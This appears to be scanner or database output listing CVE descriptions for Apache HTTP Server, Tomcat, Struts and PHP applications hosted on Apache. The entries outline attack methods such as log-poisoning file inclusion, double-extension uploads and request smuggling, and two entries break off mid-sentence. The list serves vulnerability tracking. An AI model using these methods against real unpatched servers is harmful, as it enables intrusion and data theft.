| [CVE-2007-3847] The date handling code in modules/proxy/proxy_util.c (mod_proxy) in Apache 2.3.0, when using a threaded MPM, allows remote origin servers to cause a denial of service (caching forward proxy process crash) via crafted date headers that trigger a buffer over-read.
| [CVE-2007-3571] The Apache Web Server as used in Novell NetWare 6.5 and GroupWise allows remote attackers to obtain sensitive information via a certain directive to Apache that causes the HTTP-Header response to be modified, which may reveal the server's internal IP address.
| [CVE-2007-3386] Cross-site scripting (XSS) vulnerability in the Host Manager Servlet for Apache Tomcat 6.0.0 to 6.0.13 and 5.5.0 to 5.5.24 allows remote attackers to inject arbitrary HTML and web script via crafted requests, as demonstrated using the aliases parameter to an html/add action.
| [CVE-2007-3385] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 does not properly handle the \" character sequence in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks.
| [CVE-2007-3384] Multiple cross-site scripting (XSS) vulnerabilities in examples/servlet/CookieExample in Apache Tomcat 3.3 through 3.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Value field, related to error messages.
| [CVE-2007-3383] Cross-site scripting (XSS) vulnerability in SendMailServlet in the examples web application (examples/jsp/mail/sendmail.jsp) in Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.36 allows remote attackers to inject arbitrary web script or HTML via the From field and possibly other fields, related to generation of error messages.
| [CVE-2007-3382] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 treats single quotes ("'") as delimiters in cookies, which might cause sensitive information such as session IDs to be leaked and allow remote attackers to conduct session hijacking attacks.
| [CVE-2007-3304] Apache httpd 1.3.37, 2.0.59, and 2.2.4 with the Prefork MPM module, allows local users to cause a denial of service by modifying the worker_score and process_score arrays to reference an arbitrary process ID, which is sent a SIGUSR1 signal from the master process, aka "SIGUSR1 killer."
| [CVE-2007-3303] Apache httpd 2.0.59 and 2.2.4, with the Prefork MPM module, allows local users to cause a denial of service via certain code sequences executed in a worker process that (1) stop request processing by killing all worker processes and preventing creation of replacements or (2) hang the system by forcing the master process to fork an arbitrarily large number of worker processes. NOTE: This might be an inherent design limitation of Apache with respect to worker processes in hosted environments.
| [CVE-2007-3101] Multiple cross-site scripting (XSS) vulnerabilities in certain JSF applications in Apache MyFaces Tomahawk before 1.1.6 allow remote attackers to inject arbitrary web script via the autoscroll parameter, which is injected into Javascript that is sent to the client.
| [CVE-2007-2450] Multiple cross-site scripting (XSS) vulnerabilities in the (1) Manager and (2) Host Manager web applications in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote authenticated users to inject arbitrary web script or HTML via a parameter name to manager/html/upload, and other unspecified vectors.
| [CVE-2007-2449] Multiple cross-site scripting (XSS) vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI after the '
| [CVE-2007-2353] Apache Axis 1.0 allows remote attackers to obtain sensitive information by requesting a non-existent WSDL file, which reveals the installation path in the resulting exception message.
| [CVE-2007-2025] Unrestricted file upload vulnerability in the UpLoad feature (lib/plugin/UpLoad.php) in PhpWiki 1.3.11p1 allows remote attackers to upload arbitrary PHP files with a double extension, as demonstrated by .php.3, which is interpreted by Apache as being a valid PHP file.
| [CVE-2007-1863] cache_util.c in the mod_cache module in Apache HTTP Server (httpd), when caching is enabled and a threaded Multi-Processing Module (MPM) is used, allows remote attackers to cause a denial of service (child processing handler crash) via a request with the (1) s-maxage, (2) max-age, (3) min-fresh, or (4) max-stale Cache-Control headers without a value.
| [CVE-2007-1862] The recall_headers function in mod_mem_cache in Apache 2.2.4 does not properly copy all levels of header data, which can cause Apache to return HTTP headers containing previously used data, which could be used by remote attackers to obtain potentially sensitive information.
| [CVE-2007-1860] mod_jk in Apache Tomcat JK Web Server Connector 1.2.x before 1.2.23 decodes request URLs within the Apache HTTP Server before passing the URL to Tomcat, which allows remote attackers to access protected pages via a crafted prefix JkMount, possibly involving double-encoded .. (dot dot) sequences and directory traversal, a related issue to CVE-2007-0450.
| [CVE-2007-1858] The default SSL cipher configuration in Apache Tomcat 4.1.28 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.17 uses certain insecure ciphers, including the anonymous cipher, which allows remote attackers to obtain sensitive information or have other, unspecified impacts.
| [CVE-2007-1842] Directory traversal vulnerability in login.php in JSBoard before 2.0.12 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the table parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, a related issue to CVE-2006-2019.
| [CVE-2007-1801] Directory traversal vulnerability in inc/lang.php in sBLOG 0.7.3 Beta allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the conf_lang_default parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by inc/lang.php.
| [CVE-2007-1743] suexec in Apache HTTP Server (httpd) 2.2.3 does not verify combinations of user and group IDs on the command line, which might allow local users to leverage other vulnerabilities to create arbitrary UID/GID owned files if /proc is mounted. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root." In addition, because this is dependent on other vulnerabilities, perhaps this is resultant and should not be included in CVE.
| [CVE-2007-1742] suexec in Apache HTTP Server (httpd) 2.2.3 uses a partial comparison for verifying whether the current directory is within the document root, which might allow local users to perform unauthorized operations on incorrect directories, as demonstrated using "html_backup" and "htmleditor" under an "html" directory. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
| [CVE-2007-1741] Multiple race conditions in suexec in Apache HTTP Server (httpd) 2.2.3 between directory and file validation, and their usage, allow local users to gain privileges and execute arbitrary code by renaming directories or performing symlink attacks. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."
| [CVE-2007-1720] Directory traversal vulnerability in addressbook.php in the Addressbook 1.2 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the module_name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file.
| [CVE-2007-1636] Directory traversal vulnerability in index.php in RoseOnlineCMS 3 B1 allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the op parameter, as demonstrated by injecting PHP code into Apache log files via the URL and User-Agent HTTP header.
| [CVE-2007-1633] Directory traversal vulnerability in bbcode_ref.php in the Giorgio Ciranni Splatt Forum 4.0 RC1 module for PHP-Nuke allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the name parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by bbcode_ref.php.
| [CVE-2007-1577] Directory traversal vulnerability in index.php in GeBlog 0.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the GLOBALS[tplname] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
| [CVE-2007-1539] Directory traversal vulnerability in inc/map.func.php in pragmaMX Landkarten 2.1 module allows remote attackers to include arbitrary files via a .. (dot dot) sequence in the module_name parameter, as demonstrated via a static PHP code injection attack in an Apache log file.
| [CVE-2007-1524] Directory traversal vulnerability in themes/default/ in ZomPlog 3.7.6 and earlier allows remote attackers to include arbitrary local files via a .. (dot dot) in the settings[skin] parameter, as demonstrated by injecting PHP code into an Apache HTTP Server log file, which can then be included via themes/default/.
| [CVE-2007-1491] Apache Tomcat in Avaya S87XX, S8500, and S8300 before CM 3.1.3, and Avaya SES allows connections from external interfaces via port 8009, which exposes it to attacks from outside parties.
| [CVE-2007-1358] Cross-site scripting (XSS) vulnerability in certain applications using Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.34 allows remote attackers to inject arbitrary web script or HTML via crafted "Accept-Language headers that do not conform to RFC 2616".
| [CVE-2007-1349] PerlRun.pm in Apache mod_perl before 1.30, and RegistryCooker.pm in mod_perl 2.x, does not properly escape PATH_INFO before use in a regular expression, which allows remote attackers to cause a denial of service (resource consumption) via a crafted URI.
| [CVE-2007-0975] Variable extraction vulnerability in Ian Bezanson Apache Stats before 0.0.3 beta allows attackers to overwrite critical variables, with unknown impact, when the extract function is used on the _REQUEST superglobal array.
| [CVE-2007-0930] Variable extract vulnerability in Apache Stats before 0.0.3beta allows attackers to modify arbitrary variables and conduct attacks via unknown vectors involving the use of PHP's extract function.
| [CVE-2007-0792] The mod_perl initialization script in Bugzilla 2.23.3 does not set the Bugzilla Apache configuration to allow .htaccess permissions to override file permissions, which allows remote attackers to obtain the database username and password via a direct request for the localconfig file.
| [CVE-2007-0774] Stack-based buffer overflow in the map_uri_to_worker function (native/common/jk_uri_worker_map.c) in mod_jk.so for Apache Tomcat JK Web Server Connector 1.2.19 and 1.2.20, as used in Tomcat 4.1.34 and 5.5.20, allows remote attackers to execute arbitrary code via a long URL that triggers the overflow in a URI worker map routine.
| [CVE-2007-0637] Directory traversal vulnerability in zd_numer.php in Galeria Zdjec 3.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the galeria parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by zd_numer.php.
| [CVE-2007-0451] Apache SpamAssassin before 3.1.8 allows remote attackers to cause a denial of service via long URLs in malformed HTML, which triggers "massive memory usage."
| [CVE-2007-0450] Directory traversal vulnerability in Apache HTTP Server and Tomcat 5.x before 5.5.22 and 6.x before 6.0.10, when using certain proxy modules (mod_proxy, mod_rewrite, mod_jk), allows remote attackers to read arbitrary files via a .. (dot dot) sequence with combinations of (1) "/" (slash), (2) "\" (backslash), and (3) URL-encoded backslash (%5C) characters in the URL, which are valid separators in Tomcat but not in Apache.
| [CVE-2007-0419] The BEA WebLogic Server proxy plug-in before June 2006 for the Apache HTTP Server does not properly handle protocol errors, which allows remote attackers to cause a denial of service (server outage).
| [CVE-2007-0173] Directory traversal vulnerability in index.php in L2J Statistik Script 0.09 and earlier, when register_globals is enabled and magic_quotes is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
| [CVE-2007-0098] Directory traversal vulnerability in language.php in VerliAdmin 0.3 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
| [CVE-2007-0086] ** DISPUTED ** The Apache HTTP Server, when accessed through a TCP connection with a large window size, allows remote attackers to cause a denial of service (network bandwidth consumption) via a Range header that specifies multiple copies of the same fragment. NOTE: the severity of this issue has been disputed by third parties, who state that the large window size required by the attack is not normally supported or configured by the server, or that a DDoS-style attack would accomplish the same goal.
| [CVE-2006-7217] Apache Derby before 10.2.1.6 does not determine schema privilege requirements during the DropSchemaNode bind phase, which allows remote authenticated users to execute arbitrary drop schema statements in SQL authorization mode.
| [CVE-2006-7216] Apache Derby before 10.2.1.6 does not determine privilege requirements for lock table statements at compilation time, and consequently does not enforce privilege requirements at execution time, which allows remote authenticated users to lock arbitrary tables.
| [CVE-2006-7197] The AJP connector in Apache Tomcat 5.5.15 uses an incorrect length for chunks, which can cause a buffer over-read in the ajp_process_callback in mod_jk, which allows remote attackers to read portions of sensitive memory.
| [CVE-2006-7196] Cross-site scripting (XSS) vulnerability in the calendar application example in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.15 allows remote attackers to inject arbitrary web script or HTML via the time parameter to cal2.jsp and possibly unspecified other vectors. NOTE: this may be related to CVE-2006-0254.1.
| [CVE-2006-7195] Cross-site scripting (XSS) vulnerability in implicit-objects.jsp in Apache Tomcat 5.0.0 through 5.0.30 and 5.5.0 through 5.5.17 allows remote attackers to inject arbitrary web script or HTML via certain header values.
| [CVE-2006-7098] The Debian GNU/Linux 033_-F_NO_SETSID patch for the Apache HTTP Server 1.3.34-4 does not properly disassociate httpd from a controlling tty when httpd is started interactively, which allows local users to gain privileges to that tty via a CGI program that calls the TIOCSTI ioctl.
| [CVE-2006-6869] Directory traversal vulnerability in includes/search/search_mdforum.php in MAXdev MDForum 2.0.1 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang cookie to error.php, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
| [CVE-2006-6675] Cross-site scripting (XSS) vulnerability in Novell NetWare 6.5 Support Pack 5 and 6 and Novell Apache on NetWare 2.0.48 allows remote attackers to inject arbitrary web script or HTML via unspecifeid parameters in Welcome web-app.
| [CVE-2006-6613] Directory traversal vulnerability in language.php in phpAlbum 0.4.1 Beta 6 and earlier, when magic_quotes_gpc is disabled and register_globals is enabled, allows remote attackers to include and execute arbitrary local files or obtain sensitive information via a .. (dot dot) in the pa_lang[include_file] parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by language.php.
| [CVE-2006-6589] Cross-site scripting (XSS) vulnerability in ecommerce/control/keywordsearch in the Apache Open For Business Project (OFBiz) and Opentaps 0.9.3 allows remote attackers to inject arbitrary web script or HTML via the SEARCH_STRING parameter, a different issue than CVE-2006-6587. NOTE: some of these details are obtained from third party information.
| [CVE-2006-6588] The forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) trusts the (1) dataResourceTypeId, (2) contentTypeId, and certain other hidden form fields, which allows remote attackers to create unauthorized types of content, modify content, or have other unknown impact.
| [CVE-2006-6587] Cross-site scripting (XSS) vulnerability in the forum implementation in the ecommerce component in the Apache Open For Business Project (OFBiz) allows remote attackers to inject arbitrary web script or HTML by posting a message.
| [CVE-2006-6445] Directory traversal vulnerability in error.php in Envolution 1.1.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
| [CVE-2006-6071] TWiki 4.0.5 and earlier, when running under Apache 1.3 using ApacheLogin with sessions and "ErrorDocument 401" redirects to a valid wiki topic, does not properly handle failed login attempts, which allows remote attackers to read arbitrary content by cancelling out of a failed authentication with a valid username and invalid password.
| [CVE-2006-6047] Directory traversal vulnerability in manager/index.php in Etomite 0.6.1.2 allows remote authenticated administrators to include and execute arbitrary local files via a .. (dot dot) in the f parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
| [CVE-2006-5894] Directory traversal vulnerability in lang.php in Rama CMS 0.68 and earlier, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by lang.php.
| [CVE-2006-5752] Cross-site scripting (XSS) vulnerability in mod_status.c in the mod_status module in Apache HTTP Server (httpd), when ExtendedStatus is enabled and a public server-status page is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving charsets with browsers that perform "charset detection" when the content-type is not specified.
| [CVE-2006-5733] Directory traversal vulnerability in error.php in PostNuke 0.763 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the PNSVlang (PNSV lang) cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by error.php.
| [CVE-2006-5263] Directory traversal vulnerability in templates/header.php3 in phpMyAgenda 3.1 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter, as demonstrated by a parameter value naming an Apache HTTP Server log file that apparently contains PHP code.
| [CVE-2006-4994] Multiple unquoted Windows search path vulnerabilities in Apache Friends XAMPP 1.5.2 might allow local users to gain privileges via a malicious program file in %SYSTEMDRIVE%, which is run when XAMPP attempts to execute (1) FileZillaServer.exe, (2) mysqld-nt.exe, (3) Perl.exe, or (4) xamppcontrol.exe with an unquoted "Program Files" pathname.
| [CVE-2006-4636] Directory traversal vulnerability in SZEWO PhpCommander 3.0 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Directory parameter, as demonstrated by parameter values naming Apache HTTP Server log files that apparently contain PHP code.
| [CVE-2006-4625] PHP 4.x up to 4.4.4 and PHP 5 up to 5.1.6 allows local users to bypass certain Apache HTTP Server httpd.conf options, such as safe_mode and open_basedir, via the ini_restore function, which resets the values to their php.ini (Master Value) defaults.
| [CVE-2006-4558] DeluxeBB 1.06 and earlier, when run on the Apache HTTP Server with the mod_mime module, allows remote attackers to execute arbitrary PHP code by uploading files with double extensions via the fileupload parameter in a newthread action in newpost.php.
| [CVE-2006-4191] Directory traversal vulnerability in memcp.php in XMB (Extreme Message Board) 1.9.6 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the langfilenew parameter, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by header.php.
| [CVE-2006-4154] Format string vulnerability in the mod_tcl module 1.0 for Apache 2.x allows context-dependent attackers to execute arbitrary code via format string specifiers that are not properly handled in a set_var function call in (1) tcl_cmds.c and (2) tcl_core.c.
| [CVE-2006-4110] Apache 2.2.2, when running on Windows, allows remote attackers to read source code of CGI programs via a request that contains uppercase (or alternate case) characters that bypass the case-sensitive ScriptAlias directive, but allow access to the file on case-insensitive file systems.
| [CVE-2006-4004] Directory traversal vulnerability in index.php in vbPortal 3.0.2 through 3.6.0 Beta 1, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the bbvbplang cookie, as demonstrated by injecting PHP sequences into an Apache HTTP Server log file, which is then included by index.php.
| [CVE-2006-3918] http_protocol.c in (1) IBM HTTP Server 6.0 before 6.0.2.13 and 6.1 before 6.1.0.1, and (2) Apache HTTP Server 1.3 before 1.3.35, 2.0 before 2.0.58, and 2.2 before 2.2.2, does not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated using a Flash SWF file.
| [CVE-2006-3835] Apache Tomcat 5 before 5.5.17 allows remote attackers to list directories via a semicolon (
| [CVE-2006-3747] Off-by-one error in the ldap scheme handling in the Rewrite module (mod_rewrite) in Apache 1.3 from 1.3.28, 2.0.46 and other versions before 2.0.59, and 2.2, when RewriteEngine is enabled, allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via crafted URLs that are not properly handled using certain rewrite rules.
| [CVE-2006-3362] Unrestricted file upload vulnerability in connectors/php/connector.php in FCKeditor mcpuk file manager, as used in (1) Geeklog 1.4.0 through 1.4.0sr3, (2) toendaCMS 1.0.0 Shizouka Stable and earlier, (3) WeBid 0.5.4, and possibly other products, when installed on Apache with mod_mime, allows remote attackers to upload and execute arbitrary PHP code via a filename with a .php extension and a trailing extension that is allowed, such as .zip.
| [CVE-2006-3102] Race condition in articles/BitArticle.php in Bitweaver 1.3, when run on Apache with the mod_mime extension, allows remote attackers to execute arbitrary PHP code by uploading arbitrary files with double extensions, which are stored for a small period of time under the webroot in the temp/articles directory.
| [CVE-2006-3070] write_ok.php in Zeroboard 4.1 pl8, when installed on Apache with mod_mime, allows remote attackers to bypass restrictions for uploading files with executable extensions by uploading a .htaccess file that with an AddType directive that assigns an executable module to files with assumed-safe extensions, as demonstrated by assigning the txt extension to be handled by application/x-httpd-php.
| [CVE-2006-2831] Drupal 4.6.x before 4.6.8 and 4.7.x before 4.7.2, when running under certain Apache configurations such as when FileInfo overrides are disabled within .htaccess, allows remote attackers to execute arbitrary code by uploading a file with multiple extensions, a variant of CVE-2006-2743.
| [CVE-2006-2806] The SMTP server in Apache Java Mail Enterprise Server (aka Apache James) 2.2.0 allows remote attackers to cause a denial of service (CPU consumption) via a long argument to the MAIL command.
| [CVE-2006-2743] Drupal 4.6.x before 4.6.7 and 4.7.0, when running on Apache with mod_mime, does not properly handle files with multiple extensions, which allows remote attackers to upload, modify, or execute arbitrary files in the files directory.
| [CVE-2006-2514] Coppermine galleries before 1.4.6, when running on Apache with mod_mime installed, allows remote attackers to upload arbitrary files via a filename with multiple file extensions.
| [CVE-2006-2330] PHP-Fusion 6.00.306 and earlier, running under Apache HTTP Server 1.3.27 and PHP 4.3.3, allows remote authenticated users to upload files of arbitrary types using a filename that contains two or more extensions that ends in an assumed-valid extension such as .gif, which bypasses the validation, as demonstrated by uploading then executing an avatar file that ends in ".php.gif" and contains PHP code in EXIF metadata.
| [CVE-2006-1777] Directory traversal vulnerability in doc/index.php in Jeremy Ashcraft Simplog 0.9.2 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the s parameter, as demonstrated by injecting PHP sequences into an Apache error_log file, which is then included by doc/index.php.
| [CVE-2006-1564] Untrusted search path vulnerability in libapache2-svn 1.3.0-4 for Subversion in Debian GNU/Linux includes RPATH values under the /tmp/svn directory for the (1) mod_authz_svn.so and (2) mod_dav_svn.so modules, which might allow local users to gain privileges by installing malicious libraries in that directory.
| [CVE-2006-1548] Cross-site scripting (XSS) vulnerability in (1) LookupDispatchAction and possibly (2) DispatchAction and (3) ActionDispatcher in Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to inject arbitrary web script or HTML via the parameter name, which is not filtered in the resulting error message.
| [CVE-2006-1547] ActionForm in Apache Software Foundation (ASF) Struts before 1.2.9 with BeanUtils 1.7 allows remote attackers to cause a denial of service via a multipart/form-data encoded form with a parameter name that references the public getMultipartRequestHandler method, which provides further access to elements in the CommonsMultipartRequestHandler implementation and BeanUtils.
| [CVE-2006-1546] Apache Software Foundation (ASF) Struts before 1.2.9 allows remote attackers to bypass validation via a request with a 'org.apache.struts.taglib.html.Constants.CANCEL' parameter, which causes the action to be canceled but would not be detected from applications that do not use the isCancelled check.
| [CVE-2006-1393] Multiple cross-site scripting (XSS) vulnerabilities in the mod_pubcookie Apache application server module in University of Washington Pubcookie 1.x, 3.0.0, 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified attack vectors.
| [CVE-2006-1346] Directory traversal vulnerability in inc/setLang.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences in a lang[*][file] parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by index.php.
| [CVE-2006-1292] Directory traversal vulnerability in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the phpicalendar[cookie_language] and phpicalendar[cookie_style] cookies, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included by day.php.
| [CVE-2006-1243] Directory traversal vulnerability in install05.php in Simple PHP Blog (SPB) 0.4.7.1 and earlier allows remote attackers to include and execute arbitrary local files via directory traversal sequences and a NUL (%00) character in the blog_language parameter, as demonstrated by injecting PHP sequences into an Apache access_log file, which is then included using install05.php.
| [CVE-2006-1095] Directory traversal vulnerability in the FileSession object in Mod_python module 3.2.7 for Apache allows local users to execute arbitrary code via a crafted session cookie.
| [CVE-2006-1079] htpasswd, as used in Acme thttpd 2.25b and possibly other products such as Apache, might allow local users to gain privileges via shell metacharacters in a command line argument, which is used in a call to the system function. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
| [CVE-2006-1078] Multiple buffer overflows in htpasswd, as used in Acme thttpd 2.25b, and possibly other products such as Apache, might allow local users to gain privileges via (1) a long command line argument and (2) a long line in a file. NOTE: since htpasswd is normally installed as a non-setuid program, and the exploit is through command line options, perhaps this issue should not be included in CVE. However, if there are some typical or recommended configurations that use htpasswd with sudo privileges, or common products that access htpasswd remotely, then perhaps it should be included.
13515| [CVE-2006-0743] Format string vulnerability in LocalSyslogAppender in Apache log4net 1.2.9 might allow remote attackers to cause a denial of service (memory corruption and termination) via unknown vectors.
13516| [CVE-2006-0254] Multiple cross-site scripting (XSS) vulnerabilities in Apache Geronimo 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) time parameter to cal2.jsp and (2) any invalid parameter, which causes an XSS when the log file is viewed by the Web-Access-Log viewer.
13517| [CVE-2006-0150] Multiple format string vulnerabilities in the auth_ldap_log_reason function in Apache auth_ldap 1.6.0 and earlier allows remote attackers to execute arbitrary code via various vectors, including the username.
13518| [CVE-2006-0144] The proxy server feature in go-pear.php in PHP PEAR 0.2.2, as used in Apache2Triad, allows remote attackers to execute arbitrary PHP code by redirecting go-pear.php to a malicious proxy server that provides a modified version of Tar.php with a malicious extractModify function.
13519| [CVE-2006-0042] Unspecified vulnerability in (1) apreq_parse_headers and (2) apreq_parse_urlencoded functions in Apache2::Request (Libapreq2) before 2.07 allows remote attackers cause a denial of service (CPU consumption) via unknown attack vectors that result in quadratic computational complexity.
13520| [CVE-2005-4857] eZ publish 3.5 before 3.5.7, 3.6 before 3.6.5, 3.7 before 3.7.3, and 3.8 before 20051128 allows remote authenticated users to cause a denial of service (Apache httpd segmentation fault) via a request to content/advancedsearch.php with an empty SearchContentClassID parameter, reportedly related to a "memory addressing error".
13521| [CVE-2005-4849] Apache Derby before 10.1.2.1 exposes the (1) user and (2) password attributes in cleartext via (a) the RDBNAM parameter of the ACCSEC command and (b) the output of the DatabaseMetaData.getURL function, which allows context-dependent attackers to obtain sensitive information.
13522| [CVE-2005-4836] The HTTP/1.1 connector in Apache Tomcat 4.1.15 through 4.1.40 does not reject NULL bytes in a URL when allowLinking is configured, which allows remote attackers to read JSP source files and obtain sensitive information.
13523| [CVE-2005-4814] Unrestricted file upload vulnerability in Segue CMS before 1.3.6, when the Apache HTTP Server handles .phtml files with the PHP interpreter, allows remote attackers to upload and execute arbitrary PHP code by placing .phtml files in the userfiles/ directory.
13524| [CVE-2005-4703] Apache Tomcat 4.0.3, when running on Windows, allows remote attackers to obtain sensitive information via a request for a file that contains an MS-DOS device name such as lpt9, which leaks the pathname in an error message, as demonstrated by lpt9.xtp using Nikto.
13525| [CVE-2005-3745] Cross-site scripting (XSS) vulnerability in Apache Struts 1.2.7, and possibly other versions allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly quoted or filtered when the request handler generates an error message.
13526| [CVE-2005-3630] Fedora Directory Server before 10 allows remote attackers to obtain sensitive information, such as the password from adm.conf via an IFRAME element, probably involving an Apache httpd.conf configuration that orders "allow" directives before "deny" directives.
13527| [CVE-2005-3510] Apache Tomcat 5.5.0 to 5.5.11 allows remote attackers to cause a denial of service (CPU consumption) via a large number of simultaneous requests to list a web directory that has a large number of files.
13528| [CVE-2005-3392] Unspecified vulnerability in PHP before 4.4.1, when using the virtual function on Apache 2, allows remote attackers to bypass safe_mode and open_basedir directives.
13529| [CVE-2005-3357] mod_ssl in Apache 2.0 up to 2.0.55, when configured with an SSL vhost with access control and a custom error 400 error page, allows remote attackers to cause a denial of service (application crash) via a non-SSL request to an SSL port, which triggers a NULL pointer dereference.
13530| [CVE-2005-3352] Cross-site scripting (XSS) vulnerability in the mod_imap module of Apache httpd before 1.3.35-dev and Apache httpd 2.0.x before 2.0.56-dev allows remote attackers to inject arbitrary web script or HTML via the Referer when using image maps.
13531| [CVE-2005-3319] The apache2handler SAPI (sapi_apache2.c) in the Apache module (mod_php) for PHP 5.x before 5.1.0 final and 4.4 before 4.4.1 final allows attackers to cause a denial of service (segmentation fault) via the session.save_path option in a .htaccess file or VirtualHost.
13532| [CVE-2005-3164] The AJP connector in Apache Tomcat 4.0.1 through 4.0.6 and 4.1.0 through 4.1.36, as used in Hitachi Cosminexus Application Server and standalone, does not properly handle when a connection is broken before request body data is sent in a POST request, which can lead to an information leak when "unsuitable request body data" is used for a different request, possibly related to Java Servlet pages.
13533| [CVE-2005-2970] Memory leak in the worker MPM (worker.c) for Apache 2, in certain circumstances, allows remote attackers to cause a denial of service (memory consumption) via aborted connections, which prevents the memory for the transaction pool from being reused for other connections.
13534| [CVE-2005-2963] The mod_auth_shadow module 1.0 through 1.5 and 2.0 for Apache with AuthShadow enabled uses shadow authentication for all locations that use the require group directive, even when other authentication mechanisms are specified, which might allow remote authenticated users to bypass security restrictions.
13535| [CVE-2005-2728] The byte-range filter in Apache 2.0 before 2.0.54 allows remote attackers to cause a denial of service (memory consumption) via an HTTP header with a large Range field.
13536| [CVE-2005-2660] apachetop 0.12.5 and earlier, when running in debug mode, allows local users to create or append to arbitrary files via a symlink attack on atop.debug.
13537| [CVE-2005-2088] The Apache HTTP server before 1.3.34, and 2.0.x before 2.0.55, when acting as an HTTP proxy, allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes Apache to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling."
13538| [CVE-2005-1754] ** DISPUTED ** JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to read arbitrary files via a full pathname in the argument to the Download parameter. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
13539| [CVE-2005-1753] ** DISPUTED ** ReadMessage.jsp in JavaMail API 1.1.3 through 1.3, as used by Apache Tomcat 5.0.16, allows remote attackers to view other users' e-mail attachments via a direct request to /mailboxesdir/username@domainname. NOTE: Sun and Apache dispute this issue. Sun states: "The report makes references to source code and files that do not exist in the mentioned products."
